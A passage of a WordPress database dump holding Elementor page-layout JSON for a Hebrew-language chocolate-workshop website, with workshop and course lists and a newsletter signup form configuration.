\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e467453\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":4},\"width\":{\"unit\":\"%\",\"size\":42},\"align\":\"center\",\"text\":\"\\u05de\\u05e4\\u05e8\\u05d9\\u05d3\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"bc8044c\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_show_excerpt\":\"\",\"cards_meta_data\":[],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"\\u05dc\\u05e7\\u05e8\\u05d9\\u05d0\\u05d4 \\u00bb\",\"cards_show_avatar\":\"\",\"offset\":\"\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"full_content_meta_separator\":\"\\/\\/\\/\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"595c4b79\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"55a018\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"42ec654b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7032c8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"68bbbdb2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"262a9cad\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"1c80b63c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"269f0e2a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7d91b4cb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"50ee25e1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7235e8ee\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"27c53cbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e7c936f\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il,yaaripe@gmail.com\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(812,169,'_wp_page_template','elementor_canvas'),(813,169,'_elementor_edit_mode','builder'),(814,169,'_elementor_data','[{\"id\":\"6ca0db42\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"575d07f4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4ff16304\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"13ef3f01\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2374377f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"20511488\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4a34667\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f9f9337\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bc8044c\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_show_excerpt\":\"\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"\\u05dc\\u05e7\\u05e8\\u05d9\\u05d0\\u05d4 \\u00bb\",\"offset\":\"\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"595c4b79\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"55a018\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"42ec654b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7032c8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"68bbbdb2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"262a9cad\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"1c80b63c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"269f0e2a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7d91b4cb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"50ee25e1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7235e8ee\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"27c53cbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e7c936f\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc 